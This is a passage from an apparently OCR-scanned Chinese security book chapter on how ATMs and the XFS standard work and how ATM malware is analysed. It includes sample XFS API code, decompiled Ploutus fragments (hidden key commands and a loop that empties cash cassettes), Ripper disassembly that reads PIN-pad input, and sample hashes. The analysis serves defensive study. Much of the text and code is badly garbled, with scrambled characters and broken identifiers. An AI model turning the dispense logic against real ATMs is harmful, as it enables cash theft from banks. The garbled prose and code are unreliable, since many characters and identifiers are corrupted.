e 电源 开关 (On/Off Switch) 用 于 启动 或 关闭 ATM。 

e 监视 器 /操作 面板 (SupervisorVOperator Panel) ”通常 由 测试 或 配置 ATM 的 
技术 人 员 操 纵 ， 操 控 ATM 进 入 配置 模式 。 

下 半 部 分 包括 安全 箱 内 部 的 组 件 : 

e 残 钞 箱 Purge Bin) 保存 因为 不 能 出 钞 而 退回 的 钞票 。 

e 钞 箱 (Currency Cassette) ”保存 ATIM 中 可 用 的 钞票 。 每 个 钞 箱 保 存 不 同 的 面 
额 (如 $20、$50 或 $100 的 纸币 )。 有 具体 取决 于 不 同 的 供应 商 ， 一 台 ATM 可 能 有 
一 个 或 多 个 钞 箱 。 

e 联 锁 开关 (Interlock Switch) 这 是 一 个 传 感 左 ， 当 安全 门 打开 时 通知 ATM。 
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电源 开关 PC 内 核 软盘 接口 序列 出 钞 模块 残 钞 箱 


mig d 


监视 器 面板 SEAT EPL KAFA HA 保险 柜 前 门 


[20-2 NCR Personas 5877 的 内 部 组 件 


上 和 面 介绍 了 主要 组 件 ， 那 么 它们 如 何 交 互 呢 ?下面 讲 述 取 钱 时 经 历 的 步 又 : 
(D 持 卡 人 将 银行 卡 插 入 读 卡 句 中 。 

(2) 持 卡 人 通过 密码 键盘 输入 个 人 身份 识别 码 (Personal Identification Number, PIN). 
(3) 卡 数据 和 PIN 由 XFS 管理 器 (PC 内 核 ) 处 理 后 ， 发 送 到 银行 进行 验证 。 

(4) 银行 对 卡 进行 验证 ， 然 后 反馈 验证 结果 。 

(5) 如 果 验 证 无 误 ，XFS 管 理 需 将 出 钞 通 知 友 送 给 位 于 安全 箱 的 出 钞 模 块 。 

(6) 出 钞 模块 与 保存 者 所 需 面 额 的 钞 箱 交互 ， 开 始 出 钞 。 

(7) 调用 赁 条 打印 机 ， 为 持 卡 人 提供 交易 赁 条 。 


202 XFS 概览 

XFS(Extensions for Financial Service， 人 金融 服务 扩展 ) 最 切 由 BSVC(Banking 
Solutions Vendor Council， 银 行 解决 方案 供应 商 委 员 会 ) 创 建 。BSVC 是 由 微软 公司 于 
1995 年 牵头 组 建 的 团队 。1998 年 ， 欧 洲 标准 化 委员 会 (European Committee for 
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Standardization，CEN) 认 定 XFS 为 国际 标准 。 

最 初 ，BSVC 决 定 使 用 Windows 作 为 XFS 的 操作 系统 ， 但 后 来 采用 并 增强 了 与 
XFS 配套 使 用 的 Windows 开 放 服 务 体系 结构 (Windows Open Service Architecture, 
WOSA), 将 此 定义 为 基于 Windows 的 客户 闹 / 服 务 占 体系 的 金融 应 用 程序 结构 ， 取 名 
为 WOSA/XFS。WOSA/XFS 包 含 访问 金融 外 围 设 备 的 规范 ， 外 围 设备 包 括 凭 条 打印 
机 、 读 卡 器 、 密 码 键盘 、 出 钞 模 块 和 钞 箱 。 

本 节 将 简要 介绍 WOSA/XFS。 如 须 了 解 详情 ， 建 议 阅 读 由 CEN 制 定 的 完整 规范 
CWA 13449-1.1。 


20.2.1 XFS 体系 结构 


当今 所 有 主流 ATM 供 应 商都 在 使 用 Windows 操 作 系 统 ， 因 此 必须 遵循 由 CEN 定 
义 的 XFS 标准 。 下 列 步 台 呈 现 了 工作 流程 : 

(1) 基于 Windows 的 应 用 程序 使 用 预定 义 的 一 组 应 用 程序 级 别 的 API( 以 WFS 为 
前 级 )， 通 过 XFS 与 外 围 设备 通信 。 

(2) XFS 管 理 器 将 指定 的 应 用 程序 级 别 的 API 映 射 到 相应 服务 提供 者 的 API( 以 
WFP 为 前 级 )。 

a. XFS 管 理 需 在 映射 过 程 中 使 用 存储 在 注册 表 中 的 配置 信息 。 

b. XFS 管 理 器 和 服务 提供 者 使 用 供应 商 特定 的 实现 方式 。 

(3) 来 自 外 围 设 备 的 任何 结果 都 通过 XFS 管 理 器 的 API( 以 WFM 为 前 缀 ) 发 送 给 
基于 Windows 的 应 用 程序 。 

XFS 体系 结构 如 图 20-3 所 示 。 

Windows 操作 系统 
基于 Windows 的 应 用 程序 
或 恶意 软件 


图 20-3 ”XFS 体系 结构 
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下 面 显 示 了 在 基于 Windows 的 应 用 程序 和 XFS 管 理 硕 交互 时 ， 使 用 的 利 见 应 用 
程序 级 别 的 API: 

e WFSStartUpO “将 基于 Windows 的 应 用 程序 与 XFS 管 理 需 连接 起 来 。 

e WFSOpen) “通过 XFS 管 理 右 , 在 基于 Windows 的 应 用 程序 和 服务 提供 者 之 

间 建 立会 话 。 

e WrFSRegister) 配置 要 从 服务 提供 者 处 接收 的 消息 。 

e WFSLock() 提供 对 外 围 设备 的 排他 访问 。 

e WESExecute() 根据 命令 不 同 需 要 多 次 调用 该 函数， 如 出 钞 、 读 卡 以 及 打 
印 等 。 
WFSUnlock() ”释放 对 外 围 说 备 的 独占 。 
WFSDeregister) “停止 从 服务 提供 者 处 接收 消息 。 
WFSClose( ”结束 会 话 。 
WFSCleanUpQ — 断 开 应 用 程序 与 XFS 管 理 需 的 连接 。 


L] 
* 
L] 
e 


注意 : 每 个 XFS API 都 有 同步 和 异步 版 本 ， 在 调用 时 的 工作 方式 如 下 。 

e 同步 调用 。 在 函数 运行 完全 结束 前 ， 将 限制 程序 运行 。 此 时 ， 应 用 程序 
按 顺 厅 执 行 。 

e 异步 调用 。 函 数 立 即 返 回 ， 但 完成 时 间 不 定 。 


20.22 XFS 管理 器 


每 个 ATM 供 应 商 始终 遵循 由 CEN 定 义 的 WOSA/XFS 标 准 , 通过 自己 的 中 间 件 实 
现 目 己 的 XFS 和 害 理 郁 。 下 面 列 出 当前 可 用 的 最 重要 的 XFS 中 间 件 。 

e Diebold: Agilis Power 

e NCR: APTRA ActveXFS 

e KAL: Kalignite 

e Wincor Nixdorf: Probase( 己 被 Diebold 并 购 ) 

如 前 所 述 ，XFS 官 理 堪 负 责 将 API 函 数 (以 WFS 开 头 的 DLID) 上 映射 到 SPI 函 数 (以 
WFEFP 开 头 的 DLL)， 并 调用 供应 商 专用 的 服务 。 可 使 用 FreeXFS 框架 
(OpenXFS _V0.0.0.5.rar) 信 看 实际 过 程 ， 该 框架 基于 CEN XFS 3.0， 完 整 实 现 了 
XFSManager、 各 种 设备 的 SPI(Service Provider Interfaces， 服 务 提供 接口 ) 以 及 示例 应 
用 程序 代码 。 

如 果 通 过 FreeXFS 分 析 XFSManager 实 现 ( 位 于 \ManagenNI XFSManager.h 文 件 
中 )， 可 以 清楚 地 看 到 支持 的 WFS 和 WFM API 的 定义 : 


NI XFSMANAGER API HRESULT extern WINAPI WFSStartUp ( DWORD 
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dwVersionsRequired, LPWFSVERSION lpWFSVersion); 

NI XFSMANAGER API HRESULT extern WINAPI WFSOpen ( LPSTR 
lpszLogicalName, HAPP hApp, LPSTR lpszAppID, DWORD dwTraceLevel, DWORD 
dwTimeOut, DWORD dwSrvcVersionsRequired, LPWFSVERSION lpSrvcVersion, 
LPWFSVERSION lpSPIVersion, LPHSERVICE lphService); 

NI XFSMANAGER API HRESULT extern WINAPI WFSRegister ( HSERVICE 
hService, DWORD dwEventClass, HWND hWndReg); 

NI XFSMANAGER API HRESULT extern WINAPI WFSExecute ( HSERVICE 
hService, DWORD dwCommand, LPVOID lpCmdData, DWORD dwTimeOut, 
LPWFSRESULT * lppResult); 

NI XFSMANAGER API HRESULT extern WINAPI WFSCleanUp (); 

NI XFSMANAGER API HRESULT extern WINAPI WFMAllocateBuffer( ULONG 
ulSize, ULONG ulFlags, LPVOID * lppvData); 

NI XFSMANAGER API HRESULT extern WINAPI WFMAllocateMore( ULONG 
ulSize, LPVOID lpvOriginal, LPVOID * lppvData); 

NI XFSMANAGER API HRESULT extern WINAPI WFMFreeBuffer( LPVOID 
lpvData); 


注意 : 可 在 \ManagerNI XFSManagercpp 中 找到 这 些 API 的 实现 。 


下 面 分 析 \Samples\WosaXFSTest20100106\WosaXFSTestView.cpp 中 的 代码 , LME 


完整 地 理解 XFS 和 党 理 需 的 工作 方式 。 


步骤 1: WFSStartUp 
首先 将 基于 Windows 的 应 用 程序 与 XFS 党 理 磊 连接 起 来 : 


if(m strXFSPath == "") m strXFSPath = FindXMLManagerPath () :全 
if(!LoadManagerFunction (m strXFSPath)) { e 
m strResult +=  T("WFSStartUp error in loading funcitons.\r\n"); 
m bStartUp = FALSE; 
} 
else{ 
HRESULT hr = (*m pfnWFSStartUp)( nVersion, &WFSVersion); © 
if(hr — S_OK) { 
str.Format ("WFSStartUp OK with version %08X\r\n", nVersion); 
m bStartUp = TRUE; 
} 
CString CWosaXFSTestView: :FindXMLManagerPath () @ 
{ 
HRESULT hr = WFMOpenKey (HKEY CLASSES ROOT, 
//WOSA/XFS ROOT/LOGICAL SERVICES, 
"WOSA/XFS ROOT", //lpszSubKey, 
&hKeyXFS ROOT); //phkResult, lpdwDisposition 
it[htr 1= WES SUCCESS) return -1; 


BOOL CWosaXFSTestView: :LoadManagerFunction (CString strPath)( 9 
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m hLib = LoadLibrary (strPath); 
if(m hLib == NULL) { 
m strResult += T("Load XFS Manager failed.\r\n"); 


UpdateData (FALSE) ; 
return FALSE; 


} 
else { 
m strResult += T("Load XFS Manager succeeded. \r\n"); 
UpdateData (FALSE) ; 
} 
m pfnWFSStartUp = 


(pfnWFSStartUp)GetProcAddress (m hLib, "WESStartUp"); ge 

m pfnWFSOpen = (pínWFSOpen)GetProcAddress (m hLib, WFSOpen"); 

m pfnWFMAllocateBuffer- 

(pí£nWFMAllocateBuffer)GetProcAddress (m hLib,"WFMAllocateBuffer"); 


HAZE XFS eH ae EAP BEHTEDLLIPSEBUE, FARR TE ET 
册 表 中 。 在 本 例 中 ， 通 过 FindXMLManagerPath0 函 数 @ (@ 和 @ 都 显示 了 两 次 ， 以 显 
示 畏 数 的 实现 ) 获 取 相 关 值 。 在 确定 DLL 路 径 后 ，LoadManagerFunction0 四 通过 
LoadLibrary API 将 其 加 载 到 内 存 中 。 在 同一 函数 中 ， 所 有 WFS* 和 WFM* 函 数 都 受 
XFS 和 党 理 需 的 文 持 ， 并 通过 GetProcAddress APIO JNR. 

此 时 , 将 XFS 管 理 喜 加 载 到 内 存 中 ,需要 通过 WFSStartUp API@ 与 基于 Windows 
的 应 用 程序 连接 , 该 API 传 输 的 第 一 个 参数 是 需要 由 XFS 管 理 堪 处 理 的 SPI 唉 本 范围 。 
如 采 中 辐 件 不 文 持 这 些 版 本 ， 调 用 将 返回 错误 。 


步骤 2: WFSOpen 


将 基于 Windows 的 应 用 程序 与 XFS 管理 器 连接 后 ， 就 需要 与 ATM 外 围 设 备 (也 称 
为 逻辑 服务 ) 进 行 交 互 以 执行 所 需 的 打开 读 卡 融 或 出 钞 等 操作 。 与 外 围 设备 的 交互 是 
通过 SPI 完 成 的 ， 因 此 ， 首 先 查 询 Windows 注 册 表 中 的 HKEY USERS\.DEFAULT\ 
XFS\LOGICAL SERVICES\， 识 别 所 有 可 用 的 逻辑 服务 。 

必须 注意 ， 每 个 ATM 供 应 商都 采用 自己 的 命名 约定 方式 。 例 如 ，NCR 将 出 钞 模 
块 称 为 CurrencyDispenserl1， 而 Diebold 则 将 出 钞 模块 称 为 DBD AdvFuncDisp. Œ 
试 识别 ATM 恶 意 软 件 的 目标 时 ， 这 些 信息 大 有 和 帮助。 注册 表 项 的 男 一 个 用 途 是 在 开 
始 交 互 前 通过 WFSGetInfo API 会 询 外 围 设备 的 状态 。 要 了 解 详情 ， 可 参阅 本 章 后 面 
的 20.3 节 “分 析 AITM 和 恶意 软件 ” 

确定 了 要 交互 的 逻辑 服务 后 ，WFSOpen API( 或 WFSAsyncOpen API， 具 体 取决 
于 应 用 程序 的 需要 ) 将 该 值 作为 第 一 个 参数 接收 (与 WosaXFSTestView.cpp 示 例 中 的 
做 法 类 似 ) o 该 值 通 过 m_ strLocalService4? = 8 (5535, 如 下 所 示 : 


hr — (*m pfnWFSOpen) (m strLocalService.GetBuffer(0), e 
m hAppSync,//WFS DEFAULT HAPP, //hApp, 
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"MySession", //NULL, //LPSTR lpszAppID, 

WFS TRACE ALL API, //NULL, //DWORD dwTraceLevel, 
WFS INDEFINITE WAIT, //DWORD dwTimeOut, 
0x00020003, //DWORD dwSrvcVersionsRequired, 
&WFSVersionl, //LPWFSVERSION lpSrvcVersion, 
&WFSVersion2, //LPWFSVERSION lpSPIVersion, 
&hService // LPHSERVICE lphService 


if(hr == 0) m hSyncService = hService; else m hSyncService = 0; 
if(hr == 0) 
CString Scr; 


str.Format("OK SyncOpen Service ID = $d SPI version High $04X 
Low $04XXrWMn",m hSyncService,WFSVersion2.wHighVersion,WFSVersion2.wLowVersion); 


FEST ER IULIUS. XD SAHA, qf BOSE TESI TE MAK. 

那么 ，XFS 和 过 理 圳 如何 知道 要 交互 的 SPI DLL? 信息 也 来 目 注 册 表 项 
\XFS\SERVICE PROVIDERS\， 内 容 基 于 前 面 确定 的 逻辑 服务 。 图 20-4 显 示 , pinpad 
SPI 的 DLL 是 NCR PINSPDLL。 注 意 ， 每 个 供应 了 商都 以 各 自 的 方式 独立 地 实现 SPI。 


d AE 
EES 


图 20-4 识别 SPI DLL 


2548 3: WFSRegister 


现在 ， 配 置 消息 以 便 通 过 WFSResgister API 从 服务 提供 者 处 接收 消息 。 在 下 面 的 
代码 中 可 以 看 到 ， 配 置 了 源 于 SYSTEM、USER、SERVICE 和 EXECUTE 的 事件 @: 


if (m hSyncService) { 
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WriteScript("Do", T("SyncRegister™), T("")); 


HRESULT hr = m pfnWFSRegister (m hSyncService 
:SYSTEM EVENTS | USER EVENTS | SERVICE EVENTS | 
EXECUTE EVENTS@, m hWnd) ; 


+578 4: WFSExecute 


BURY 8 ERZPEROSfBHOE A. EA AS ER re Ts Rh FB] c tir (BE 48 HR 
F)IBILSPTSE HL ERIT BRE ots RUBRTE LTR BORIS Bas UR EF Atrack 1 和 track 
2 上 的 数据 ， 并 要 求 出 钞 模块 出 钞 ! 

图 20-$ 显 示 了 正在 运行 的 Ripper 亚 意 软 件 ( 本 和 草 将 一 直 使 用 这 个 恶意 软件 示例 
1$632224b7eSca0ccb0a042daf2adc13)， 调 用 WFSAsyncExecute API， 接 收 的 第 二 个 参 
数 是 要 执行 的 操作 (在 本 例 中 ，WFS_CMD PIN GET DATA 用 于 读 取 从 密码 键盘 输 
入 的 信息 )。 


xor ebx, ebx 

push 408 ; WFS. CHD PIN GET. DATA 
inc ebx 

push ecx 

mou [ebptuar 18]. ebx 

Inou [ebp*uar 8], OCOOh 

mov [edx*83Ch], bl 


call ds: WFSAsyncExecute 


图 20-5 与 密码 键盘 进行 交互 
上 面 介绍 了 处 理 日 常 操作 时 , 遵循 XFS 标准 的 ATM 的 所 有 工作 细节 , 讨论 了 XFS 
管理 器 在 协调 各 方 工作 方面 的 重要 性 。20.3 节 将 介绍 用 于 分 析 ATM 恶 意 软件 的 技术 。 
20.3 ”分 析 ATM 恶 意 软件 


前 面 讲 述 了 符合 XFS 标准 的 ATM 的 详细 工作 原理 ,下面 基于 现实 中 的 实际 威胁 ， 
介绍 一 些 用 来 分 析 AITM 恶 意 软 件 的 有 用 技术 。 

我 们 将 简要 介绍 AITM 和 恶意 软件 的 主要 功能 ， 方 便 你 了 解 现 实生 活 中 存在 哪些 类 
型 的 威胁 ， 这 些 恶 意 软件 如 何 被 安装 到 ATM 上， 如 何 与 攻击 者 交互 ， 以 及 如 何 盗 取 
信息 或 钞票 ! 

20.31 ATM 恶 意 软件 的 类 型 

有 两 类 ATM 恶 意 软件 ， 一 类 针对 持 卡 人 ， 另 一 类 针对 银行 。 

1. 针对 持 卡 人 的 恶意 软件 

此 类 恶意 软件 专门 从 ATM 资 取信 息 ， 如 受害 人 的 姓名 、 储 蕾 卡号 、 到 期 日 期 以 
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及 加 密 的 PIN 等 。 此 后 将 所 有 这 些 数 据 放 在 黑市 上 出 售 ， 由 不 法 分 了 克隆 储 荔 卡 ， 
未 经 授权 完成 网 上 文 付 等 。 从 恶意 软件 分 析 的 角度 看 , 这 些 威胁 都 像 是 信息 盗 取 者 ， 
在 分 析 期 间 不 需要 了 解 有 关 ATM 的 信息 。 此 类 威胁 的 例子 有 发 生 在 拉丁 美洲 的 
PanDeBono 和 NeaBolsa。 此 类 威胁 通过 插入 机 器 的 USB 设 备 盗 取信 息 ，USB 设 备 由 
运行 的 恶意 软件 识别 和 验证 。 

盗 读 器 设备 与 物理 攻击 相关 ， 因 此 不 属于 本 章 的 讨论 范畴 。 但 因为 它们 会 影响 
持 卡 人 ， 这 里 有 必要 提 一 下 。 这 些 设 备 以 隐蔽 的 方式 连接 到 AITM， 受 害 人 不 会 看 到 
它们 (如 图 20-6 所 示 )。 这 些 设 备 要 么 有 一 个 摄像 头 ， 要么 有 一 个 伪造 的 密码 键盘 或 读 
卡 占 ， 主 要 目的 是 捕获 和 输入 的 PIN 人 码 或 盗 取 储 著 卡 数据 。 它 们 能 通过 监 直 、GSM 或 
其 他 任何 无 线 通 信 设 备 ， 将 盗 取 的 信息 实时 传递 给 攻击 者 。 


图 20-6 ”连接 到 ATM 上 的 盗 读 器 
2. 针对 银行 的 普 意 软件 
此 类 恶意 软件 清空 AIM; 因此 ， 持 卡 人 不 受 影响 ， 倒 每 的 是 银行 。 要 做 到 这 一 
点 ， 归 人 么 重用 安装 在 AIM 上 的 XFS 中 国 件 ， 要 么 创建 一 个 符合 XFS 标 准 的 应 用 程序 。 
此 类 威胁 的 例子 有 Ploutus、Alice、SUCEFUL、Ripper、Padpin(Kaspersky 后 来 将 其 
称 为 Tyupkin) 和 GreenDispenser。 
20.3.2 攻击 者 是 如 何在 ATM 上 安装 恶意 软件 的 
本 节 将 描述 攻击 者 用 恶意 软件 感染 ATM 的 不 同 技术 ， 从 而 帮助 读者 进行 抵制 。 


#208 ATM 亚 意 软件 


1. 物理 和 虚拟 攻击 


实施 物理 攻击 时 ， 攻 击 者 打开 ATM 的 上 半 部 分 ( 见 图 20-1)， 通 过 以 下 技术 注入 
恶意 软件 : 
e 连接 USB 或 CD-ROM 并 重启 设备 。 这 样 ， 可 以 更 改 BIOS 引 导 顺 序 ， 重 新 连 
接 的 设备 局 动 ， 并 开始 安装 恶意 软件 。 

e 弛 下 ATM 上 的 硬盘 ， 将 其 作为 从 盘 连 接 到 攻击 者 的 笔记 本 电脑 上 ， 然 后 注 
入 恶意 软件 。 另 外 ， 可 将 ATM 硬 盘 蔡 换 成 攻击 者 预先 为 攻击 模式 准备 的 
硬盘。 

而 在 虚拟 攻击 中 ， 攻 击 者 会 设法 冯 入 银行 的 网 络 或 文 付 入 口 。 一 旦 进入 ， 目 标 
就 是 找到 ATM 所 连接 的 网 络 段 ， 查 找 漏洞 ， 以 便 经 由 网 络 将 恶意 软件 传输 到 AT™M。 
这 种 攻击 能 量 极 大 ， 因 为 全 球 的 AITM 都 会 党 到 影响 。Ripper AIM 恶 意 软件 采用 的 驶 
是 这 种 做 法 。 攻击 者 通过 银行 网 络 感染 位 于 泰国 的 ATIM, 然后 越境 罪犯 (这 些 人 负责 
从 ATM 取 钞 ) 涌 入 泰国 ， 在 数 小 时 内 掏 空 ATM。 


2. 攻击 者 与 恶意 软件 交互 


一 旦 在 AIM 上 安装 了 恶意 软件 ， 攻 击 者 会 通过 一 种 方式 ， 在 持 卡 人 不 守 沉 的 情 
况 下 与 ATM 交 互 。 这 意味 着 ， 只 有 在 收 到 某 些 激活 指令 后 ， 屏 人 幕 上 才 会 弹出 恶意 软 
件 界 面 。 

第 一 个 已 知 的 案例 (Ploutus 恶 意 软件 , MD5 值 为 488acf3e6ba215edef77fd900e6eb33b) 
将 一 个 外 部 键盘 连接 到 ATM。 了 Ploutus 执 行 “ 击 键 记录 ” 人 允许 攻击 者 截获 任何 击 键 
信息 ， 找 到 正确 的 击 键 组 合 后 ， 将 激活 GUI， 人 允许 攻击 者 根据 需要 使 ATM 出 钞 。 在 
下 面 的 代码 清单 中 ，Ploutus 正 在 检查 是 否 输入 了 F 键 ， 以 便 执 行 特定 命令 。 例 如 ， 
F4 和 @ 键 将 隐藏 GUI 界面 。 


if (PloutusService.MemoryData.GuiEnable) 


{ 

if (KeyData.KeyCode == System.Windows.Forms.Keys.F1) 
PloutusService. Keyboard. ProcessCommandGui (1); 

if (KeyData.KeyCode == System.Windows.Forms.Keys.F2) 
PloutusService. Keyboard. ProcessCommandGui (2); 

if (KeyData.KeyCode == System.Windows.Forms.Keys.F3) 
PloutusService.Keyboard.ProcessCommandGui (3); 

if (KeyData.KeyCode == System.Windows.Forms.Keys.F4) 

{ 


PloutusService.Program.NCRV.UIDisable();@® 
PloutusService.Program.NCRV.ClearText (); 
PloutusService.MemoryData.Command = System.String.Empty; 


if (KeyData.KeyCode == System.Windows.Forms.Keys.F5) 
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PloutusService.Program.NCRV.KeyControlUp(); 

if (KeyData.KeyCode == System.Windows.Forms.Keys.F6) 
PloutusService.Program.NCRV.KeyControlDown(); 

if (KeyData.KeyCode == System.Windows.Forms.Keys.F7) 
PloutusService.Program.NCRV.KeyControlNext (); 

if (KeyData.KeyCode == System.Windows.Forms.Keys.F8) 
PloutusService.Program.NCRV.KeyControlBack () ; 

} 


第 二 种 交互 方式 是 通过 密码 键盘 进行 交互 。 此 时 ， 攻 击 者 输入 数字 组 合 ， 打 开 
EAA. Alt, Mma m EAA XFS API， 如 图 20-5 所 示 。 其 中 ， 
PIN_GET_DATA 命 令 正在 读 取 输入 的 信息 。 

最 后 一 种 交互 方式 是 使 用 ATM 读 卡 器 。 与 密码 键盘 策略 类 似 , 恶意 软件 使 用 XFS 
API， 但 此 次 与 目标 设备 交互 ， 读 取 的 是 储蓄 卡 track 1 和 track 2 上 的 数据 。 如 果 提 供 
了 攻击 者 需要 的 神奇 数字 ， 将 激活 GUI。 在 诸如 Ripper 的 情形 中 ， 触 发 器 开始 掏 空 
ATM. 


3. 信息 或 现 钞 是 如 何 被 次 取 的 


在 将 持 卡 人 数据 作为 目标 时 ， 如 果 使 用 盗 读 右 ， 这 些 设备 目 市 的 无 线 协 议 (如 
GSM) 可 使 攻击 者 实时 接收 盗 来 的 信息 。 在 使 用 和 性 意 软 件 ( 如 PanDeBono 或 NeaBolsa 
亚 意 软件 ) 完 成 该 目标 时 ， 会 将 盗 来 的 信息 复制 到 攻击 者 已 插入 AITM 的 USB 中 。 

盗 取 钞票 时 ， 所 有 威胁 只 使 用 XFS API 与 ATM 出 钞 模块 交互 (不 需要 漏洞 攻击 程 
序 ， 也 不 需要 绕 过 里 份 验 证 )， 出 钞 模块 将 不 加 限制 地 开始 吐 钞 。 可 参阅 本 章 后 面 的 
20.3.4 万 “针对 AIM 恶 意 软 件 的 对 策 ”， 了 解 缓解 此 类 风险 的 建议 。 


20.3.3 剂 析 恶意 软件 


本 节 将 讨论 如 何 剖析 恶意 软件 ， 提 取 最 重要 的 入 侵 指标 (ndicators Of 
Compromise，IOC)。 在 研究 恶意 软件 时 ， 主 要 目标 如 下 : 

(1) 确认 样本 以 ATM 为 目标 。 

(2) 确认 样本 是 恶意 软件 。 

G) 确定 恶意 软件 的 安装 方式 。 通 常 很 难 了 解 这 一 点 ， 除 非 受 感染 的 客户 提供 
了 相关 信息 。 

(4) 确定 恶意 软件 与 攻击 者 的 交互 方式 。 

(5) 确定 恶意 软件 的 目的 是 针对 持 卡 人 还 是 ATM 中 的 现 钞 。 

本 节 详 细 介 绍 其 中 一 些 步 又。 


1. 确认 样本 以 ATM 为 目标 
如 果 因 为 工作 需要 ， 需 要 分 析 ATM 恶 意 软件 ， 那 么 首先 要 确认 提供 的 样本 确实 
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将 这 些 ATM 作 为 目标 。 一 种 验证 方法 是 检查 相关 的 二 进 制 代码 是 否 正 在 导入 
MSXFS.dll, MSXFS.dll 7 SE I ATM HF BRU XFS & FH at (AS Bt BT TA FS HY) WES* 和 
WFM* 函 数 ) 的 DLL。 这 是 一 个 强 有 力 的 指标 。 图 20-7 显 示 了 Ripper AITM 和 恶意 软件 的 
导入 表 (UPX 己 经 解压 缩 该 软件 )。 可 以 看 到 ， 己 经 导入 了 MSXFS.dll。 其 他 恶意 软件 
系列 (如 GreenDispenser、Alice、SUCEFUL 和 Padpin) 同 样 如 此 。 


H8 WFSC lose | MSAFS.dll 


图 20-7 Ripper ATM 恶 意 软件 正在 导入 MSXFS.dl 


Ploutus 等 恶意 软件 不 谭 循 这 个 委 略 ， 因 此 看 不 到 上 述 指标 。 相 反 ， 应 当 答 找 对 
XFS 中 间 件 的 引用 。Ploutus 能 控制 来 自 NCR 和 Kalignite 的 中 间 件 ， 多 个 供应 商都 能 
peep lal AE. 这些 情况 下 ， 应 当 但 找 是 人 否 存 在 NCR.APTRA.AXFS 和 K3A .Platform.dll 
之 类 的 库 ， 并 相应 地 进行 验证 。 


ff EE: 该 方法 假定 恶意 软件 并 未 打包 ， 也 未 混淆 。 否 则 (Ploutus 始 终 进行 高 
VÀ 度 泥 清 处 理 )， 第 一 步 是 反 混 清 或 解压 缩 样本 ， 此 后 再 分 析 上 述 指标 , 
2. 确认 样本 是 恶意 软件 


在 确定 相关 样本 是 以 我 们 的 AITM 为 目标 之 后 ， 下 一 步 必 须 确 认 它 是 恶意 软件 。 
为 什么 这 样 做 呢 ? 因为 样本 也 可 能 是 ATM 测 试 工 具 ， 此 类 工具 使 用 相同 的 库 完 成 合 
法 目标 (例如 ， 取 球 或 恋 卡 ， 以 验证 外 围 设备 工作 正常 )。 
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为 此 ， 一 种 方式 是 查看 样本 中 的 日 志 记 录 或 目 定义 错误 消息 。 有 时 ， 很 容易 就 
能 找到 这 些 目 定义 错误 消息 。 人 例如， 截至 撰写 本 书 时 ， 最 新 的 Ploutus-D 变 体 包 含 消 
息 PLOUTUS-MADE-IN-LATIN-AMERICA-XD， 这 清楚 地 告诉 我 们 ， 它 就 是 恶意 
件 。 图 20-8 显 示 了 在 Ripper 恶 意 软件 中 提取 的 字符 串 。 分 析 这 里 的 日 定义 错误 消 明 ， 
W “Dispensing %d items from cash unit. CLEAN LOGS 和 NETWORK: DISABLE”; 
这 些 消息 强烈 暗示 ， 这 个 样本 正在 实施 一 些 恶 意 行 为 。 


图 20-8 Ripper PHJ BE X £H RIH Js 


男 一 项 重要 验证 则 与 正在 壬 试 出 钞 的 代码 相关 (如 果 出 钞 代 码 位 于 一 个 循环 中 ， 
试图 掏 空 AIM， 则 更 能 证 明 这 一 点 )。 

下 面 的 代码 清单 显示 了 Ploutus 版 本 中 敌 名 的 循环 。 它 取出 钞 箱 4 中 的 面额 ($5、 
$20、$50 或 $100)， 乘 以 出 钞 模块 允许 的 最 大 纸币 数 (QNCR Personas 古 Ploutus 的 一 个 
目标 ， 最 大 数量 是 40)， 以 便 计 算 提 取 总 额 @。 如 果 钞 箱 中 的 纸币 数量 少 于 40， 则 移 
到 下 一 个 钞 箱 ， 执 行 相 同 的 操作 上 四。Ploutus 想 从 装 钱 最 多 的 钞 箱 开始 加 载 ! 这 个 过 
程 不 断 重 复 @， 直 到 将 钞 箱 掏 空 为 止 。 

int i2 = Cassette4.CashUnitValue; 

DispenceA — PloutusService.MemoryData.Bill * 

System. Int32.Parse(i2.ToString());@ 

int i3 = Cassette4.UnitCurrentCount; 


PloutusService.Utils.UpdateLog ("CashUnitCurrentCount -Cassette4:" +13); 
if (System. Int32.Parse(i3.ToString()) < 40) 


{ 
int i4 = Cassette3.CashUnitValue; © 
DispenceA = PloutusService.MemoryData.Bill * 
System.Int32.Parse(14.ToString()); 
} 
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int 15 = Cassette4.UnitCurrentCount; 
int 16 = Cassette3.UnitCurrentCount; 
PloutusService.Utils.UpdateLog ("CashUnitCurrentCount -Cassette3:" + 16); 
if ((System.Int32.Parse(i15.ToString()) < 40) & 
(System.Int32.Parse(i6.ToString()) < 40)) 
{ 
int i7 = Cassette2.CashUnitValue; © 
DispenceA = PloutusService.MemoryData.Bill * 
System.Int32.Parse(i7.ToString()); 
} 
int 18 = Cassette4.UnitCurrentCount; 
Cassette3.UnitCurrentCount; 


int 19 
int 110 = Cassette2.UnitCurrentCount; 
PloutusService.Utils.UpdateLog ("CashUnitCurrentCount -Cassette2:" +110); 
if ((System.Int32.Parse(i8.ToString()) « 40) & 
(System.Int32.Parse(i9.ToString()) « 40) & 
(System.Int32.Parse(ilO0.ToString()) < 40)) 
{ 

int ill = Cassettel.CashUnitValue; 

DispenceA = PloutusService.MemoryData.Bill * 
System. Int32.Parse(i11.ToString()); 


3. 确定 恶意 软件 与 攻击 者 的 交互 方式 
这 个 步骤 将 传统 的 恶意 软件 分 析 与 基于 AITM 的 分 析 分 开 。 这 里 重点 分 析 XFS 


API， 以 理解 恶意 软件 的 目的 。 重 点 介绍 的 两 个 主要 API 是 WFSOpen 和 
WFSExecute( 或 它们 的 异步 版 本 )。 


n 前 所 述 ， 通 过 WFSOpen API， 可 了 解 恶 意 软件 正在 答 试 与 哪个 外 围 设 备 进行 
。 这 可 使 我 们 大 致 了 解 恶 意 软 件 正 在 冬 斌 做 什么 。 例 如 ， 如 果 只 看 到 与 密码 键 


ME 那么 这 可 能 是 与 恶意 软件 的 交互 方式 。 


如 果 人 三 看 IDA Disassembler 的 Imports 选 择 卡 ， 然 后 在 相关 API 上 按 下 x， 将 显示 


二 进 制 文 件 中 该 API 的 所 有 引用 ， 如 图 20-9 所 示 。 


| [s] IDA ViewA Ot Hex View-A 2m Exports fee Imports Names bri Functions | "-" Strings Å Structures | Em Enums 


* .idata-:8852801F8 extrn WFSGetInFo:dword ; DATA XREF: sub 5482526«60Tr 
.idata:8054281F8 ; sub 488EEA+1DTr ... 
* .idata:ü85281F^ extrn UFSExecutezdword =; DATA AREF: sub h81D8F«278fr 
.idata:885281F^ ; sub 488FC8«189Tr ... 
* .idata:884281F8 extrn WFSRegister:dword ; DATA XREF: sub ^8955D-111r 
* .idata: BB842R1FE extrn -dword ; DATA XREF: sub 48691E9+4FTr 
